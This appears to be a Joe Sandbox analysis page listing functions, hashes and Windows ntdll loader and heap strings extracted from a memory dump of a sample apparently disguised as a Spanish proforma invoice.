                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 02b72fc88ef52d6405b94798f059a17c22fbcd22924101832ac4a960671f2345
                                                  • Instruction ID: 5a1ab5df8ab807bed0fe076c381ddc1455e131848f4df9f62c93e2892707ff84
                                                  • Opcode Fuzzy Hash: 02b72fc88ef52d6405b94798f059a17c22fbcd22924101832ac4a960671f2345
                                                  • Instruction Fuzzy Hash: 64F1AC74A10605DFEB06DF68C988BAAB7F6FF44348FA48198E5059F281D734E981CF91
                                                  Function 36759723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  • Opcode ID: a2fdf29ffa4016d3ae1bd5f01cde4200e77151bd3b9109c1607ec6d3e2397b5d
                                                  • Instruction ID: 3d8bd300df214e13896ac38a43635e080c40297750bad463de0a53d8c48dde4b
                                                  • Opcode Fuzzy Hash: a2fdf29ffa4016d3ae1bd5f01cde4200e77151bd3b9109c1607ec6d3e2397b5d
                                                  • Instruction Fuzzy Hash: B9510571A007419FE710DF38CC88B2977A2BB88714F954AADE7519F281EB34E851CB93
                                                  Function 3676C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 367A80E9
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 367A80F3
                                                  • Failed to reallocate the system dirs string !, xrefs: 367A80E2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: 034022a0927ddffb14a70c4f691f5c194aabb203c463d85bc11f5ebb005155dc
                                                  • Instruction ID: d82482c5753294d82c3805e06c99c29cbd8e60cf01295017d363e1b56d75431e
                                                  • Opcode Fuzzy Hash: 034022a0927ddffb14a70c4f691f5c194aabb203c463d85bc11f5ebb005155dc
                                                  • Instruction Fuzzy Hash: A5413CB5910300ABD710DF25CC44B6B37EAFF48754F80892ABB68AF250EB34D841CB96
                                                  Function 367B43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • LdrpCheckRedirection, xrefs: 367B450F
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 367B4508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 367B4519
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: db82bd87166bf9f74c7a3b483f49b2ec6bd136a0d1dc7a083d860f28e0ab406f
                                                  • Instruction ID: af7ec59e629c1fdee7434c2f7682402b1f1e2d2d98683f44e7a43e3a8d9c20c3
                                                  • Opcode Fuzzy Hash: db82bd87166bf9f74c7a3b483f49b2ec6bd136a0d1dc7a083d860f28e0ab406f
                                                  • Instruction Fuzzy Hash: 4541E476A043219FDF20CF59C940A2677E6AF48794F8546A9ED48EF35ED730D820CBA1
                                                  Function 3680ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 592b904b077a3881b91e1d1fc421c94fb30303e768137827c3c22df4efc7ad7f
                                                  • Instruction ID: 7316666019d2537a9c7e2eebaafe12dee917f0d4fd863beca9280da1c0166b5d
                                                  • Opcode Fuzzy Hash: 592b904b077a3881b91e1d1fc421c94fb30303e768137827c3c22df4efc7ad7f
                                                  • Instruction Fuzzy Hash: 39F12772E00211AFDB08CF69CD906BEBBF5AF8C240B59456DD866DB381D674EA05CF90
                                                  Function 36727662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: 7b323f3fc637cf66b59037723793d0bbe347f07dbb5901afe1a3c6248fdf45b5
                                                  • Instruction ID: c505eb29d66b193acd44f1c5d4b3da4cfe7544ecda68dc3d6e1598b14384c161
                                                  • Opcode Fuzzy Hash: 7b323f3fc637cf66b59037723793d0bbe347f07dbb5901afe1a3c6248fdf45b5
                                                  • Instruction Fuzzy Hash: 8E014C36424250EEE3058328D80DF927BF4DB81B34FE48499E5409F5918B99DC50D971
                                                  Function 36730485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • kLsE, xrefs: 367305FE
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36730586
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: f3dff8613bac1576aefe7ab03b5d32f5c4f52ab09b4149e5e5390b22786bf27e
                                                  • Instruction ID: 642bdd103eb5ab7def208c55fbd493b78d22ca081da71977beb68a555e31ecc0
                                                  • Opcode Fuzzy Hash: f3dff8613bac1576aefe7ab03b5d32f5c4f52ab09b4149e5e5390b22786bf27e
                                                  • Instruction Fuzzy Hash: 3451F3B5A12746DFE710CFA5C444AABB7F5AF04304FA0843ED6D58B202E7749585CBE2
                                                  Function 3673B5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUp6$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-3287053716
                                                  • Opcode ID: 46007c87b55eea813615ab5659d82461b949e8e8acbb6e36803c31af9e07684c
                                                  • Instruction ID: 9aa00029347239f36dcc19860b0696faacb1d61e3f38c6e30d1eb0a666d6e203
                                                  • Opcode Fuzzy Hash: 46007c87b55eea813615ab5659d82461b949e8e8acbb6e36803c31af9e07684c
                                                  • Instruction Fuzzy Hash: 57B1AE75A11715CBEB14CF66D894BADB7F2AF54B64FA08529E811DF382E730E840CB90
                                                  Function 3673A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  • Opcode ID: 79ca59ac1d38573a7762a96cc756a2885357678ae4699f4bf9fd0c57b78d21ae
                                                  • Instruction ID: 5dd6227d035e7a540178ebe029354f7fbfc40982e00cc023b55cf098764f6ff9
                                                  • Opcode Fuzzy Hash: 79ca59ac1d38573a7762a96cc756a2885357678ae4699f4bf9fd0c57b78d21ae
                                                  • Instruction Fuzzy Hash: 27C1BC74519381CFE301CF29C445BAAB3E1FF84748F908969F8958F252EBB4C945CB96
                                                  Function 36768322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpInitializeProcess, xrefs: 36768342
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36768341
                                                  • @, xrefs: 367684B1
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3676847E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1918872054
                                                  • Opcode ID: 1913ec35e91b89fff7ab6c0cfc0b210f0c11a77b8a9b8abda94541832f5014c7
                                                  • Instruction ID: 6027c90423b65dc092436c5cb269ece7177b7acd6a8651358f9756c69e8a5d6f
                                                  • Opcode Fuzzy Hash: 1913ec35e91b89fff7ab6c0cfc0b210f0c11a77b8a9b8abda94541832f5014c7
                                                  • Instruction Fuzzy Hash: B2918E71508340AEE721DE62CC84F6BBBEDEF84788FC0492DFA949A150E774D944CB62
                                                  Function 3676265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 367A20C0
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 367A1FE3, 367A20BB
                                                  • SXS: %s() passed the empty activation context, xrefs: 367A1FE8
                                                  • .Local, xrefs: 367627F8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  • Opcode ID: 5f05915ed797e6ac7d7dbcceb87e6049d60e70768c66bb287637c2f26bbbd41a
                                                  • Instruction ID: 77bd9310c2cdde4296235e3018f465842b1ce13516d31cf22686a2cb2f221185
                                                  • Opcode Fuzzy Hash: 5f05915ed797e6ac7d7dbcceb87e6049d60e70768c66bb287637c2f26bbbd41a
                                                  • Instruction Fuzzy Hash: FFA1C235D0032A9BEB60CF56CC88BA9B3B1BF58358F9441E9D818AF251D7349E81CF94
                                                  Function 367C327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}q6
                                                  • API String ID: 0-1370236184
                                                  • Opcode ID: 18cd2b550bb20023aa72233de855a6cf192cbdb569b15bd2b33d76ee988dc98c
                                                  • Instruction ID: f117a9c4afe4537bd7fa4ac8efa7fde6cc78b12932baf20b368daa23b8e8f8a8
                                                  • Opcode Fuzzy Hash: 18cd2b550bb20023aa72233de855a6cf192cbdb569b15bd2b33d76ee988dc98c
                                                  • Instruction Fuzzy Hash: F6819E75608350AFE711CB26CC84B6ABBE9FF84764F80492DF9949F290DB75D900CB92
                                                  Function 3673B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUp6$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-2650556864
                                                  • Opcode ID: ae752f376dd01c99eb67a51ba5a60e7b236876f583c44dbef0d3d9378f3090c5
                                                  • Instruction ID: 7783cd66aaaf1c7a59671bb4b2214beee9165dbd305c6bc7f12f93b76efded18
                                                  • Opcode Fuzzy Hash: ae752f376dd01c99eb67a51ba5a60e7b236876f583c44dbef0d3d9378f3090c5
                                                  • Instruction Fuzzy Hash: 3F91CC75E06319CBEB11CF65D8447ED73B1EF14B64FA48195E800AF291D7389A80CBD1
                                                  Function 367363CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36790DEC
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36790E2F
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36790EB5
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36790E72
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  • Opcode ID: 8d3496d25ed9e425f9b495fe43123acfde8b185ff1ca42c1638649ce2ee80634
                                                  • Instruction ID: 97ec1b9f4ec13851861ccf7fc3dfc7d79c26a47d08c81470a148fc481053e86e
                                                  • Opcode Fuzzy Hash: 8d3496d25ed9e425f9b495fe43123acfde8b185ff1ca42c1638649ce2ee80634
                                                  • Instruction Fuzzy Hash: AD71B4B19043049FDBA0DF14C889B977BE9AF45794FA04468F9488F287D734D698CBD2
                                                  Function 3672F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 5d400076d96976c44136d832de47bfcbab47b86b6c61d767849364ba1f392dcd
                                                  • Instruction ID: d958779146dd43385e5ecb4a0274a470cabda5e00e4b7db16dfe486570d440f7
                                                  • Opcode Fuzzy Hash: 5d400076d96976c44136d832de47bfcbab47b86b6c61d767849364ba1f392dcd
                                                  • Instruction Fuzzy Hash: 5B612375654741AFE311CB64CC49F27B7EAEF80B94F840458EA648F291DB38E801CB63
                                                  Function 367290F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 2994545307-1391187441
                                                  • Opcode ID: 34b6216c2917006e64f3000f90e7717b99230684609a34fb761f4dd24362676f
                                                  • Instruction ID: e632a571c1f34ee8f2e68e0846cfc7eda716bc207eda227794c3c184e46eae89
                                                  • Opcode Fuzzy Hash: 34b6216c2917006e64f3000f90e7717b99230684609a34fb761f4dd24362676f
                                                  • Instruction Fuzzy Hash: FA31F776900215EFEB01CB56CC8CF9AB7B9EF45BA0F944091E514AF291D734ED40CEA1
                                                  Function 367B166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                  • API String ID: 0-1880532218
                                                  • Opcode ID: 3e055e2018be4869da48621f967785c94a961b925f082c08c438bbc53e2ee4cf
                                                  • Instruction ID: b65aee0be28aaed4cd9829d78bc3ef1e417d43642990973c3cffc9d35cc5b99d
                                                  • Opcode Fuzzy Hash: 3e055e2018be4869da48621f967785c94a961b925f082c08c438bbc53e2ee4cf
                                                  • Instruction Fuzzy Hash: 25217B7AE012049BDB01CB58DC41FAABBF6AF45744F9440BAE806EF341EBB4D905C780
                                                  Function 36737072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ac615fd8dea1fe7d96d6890b0dc2803d24339950f5fda8140193f425fabb19fb
                                                  • Instruction ID: f9fa03aa9ef1ff6a2d34ee872db684e6afb7baf5fa49520b20aab5a9ae4e5a30
                                                  • Opcode Fuzzy Hash: ac615fd8dea1fe7d96d6890b0dc2803d24339950f5fda8140193f425fabb19fb
                                                  • Instruction Fuzzy Hash: 89514134E11615EFEB01CB29C8887EDBBF2BF44315FA0812AE5129B290DB709951CFC1
                                                  Function 367C3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  • Opcode ID: f4de2bf5595ebcccd77be0a424de66153c2920ee033a175db469c294dc348abf
                                                  • Instruction ID: 749d820928f973763fdbcf6749cce9e033d82a6e042753227013072a59529abe
                                                  • Opcode Fuzzy Hash: f4de2bf5595ebcccd77be0a424de66153c2920ee033a175db469c294dc348abf
                                                  • Instruction Fuzzy Hash: B0F161B5E002288BDB21CF15CCC4BE9B3B6EF44764F9481D9D609AB241EB319E85CF95
                                                  Function 36731380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36731648
                                                  • HEAP: , xrefs: 367314B6
                                                  • HEAP[%wZ]: , xrefs: 36731632
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 5f83b32083059dc1b63b9c5ad82edd1b7a9c73cdf77bffa8f458ef57c1baa779
                                                  • Instruction ID: 08b3b8c2c22676fc7403751a5d52bf8065dde214ef1cf007ae1c2f3d9b881ff8
                                                  • Opcode Fuzzy Hash: 5f83b32083059dc1b63b9c5ad82edd1b7a9c73cdf77bffa8f458ef57c1baa779
                                                  • Instruction Fuzzy Hash: 36E11074A013559FE714CF69C84177ABBF2AF48348FA4C85DE5968F242EB34D981CB90
                                                  Function 3675F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 367A0128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 367A00C7
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 367A00F1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 879a971338da6ab879ecc19d71a56a11e8c2fa6f334fe8a23bd031bbd86b29b6
                                                  • Instruction ID: 86462517c5377d59ee1592dc770179682581824d0aa482690d7012e23cdca043
                                                  • Opcode Fuzzy Hash: 879a971338da6ab879ecc19d71a56a11e8c2fa6f334fe8a23bd031bbd86b29b6
                                                  • Instruction Fuzzy Hash: B1E1C174A047419FE711CF28C844B6AB7E2FF44358FA14A59F6A58F2D0DB38D946CB82
                                                  Function 367B330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
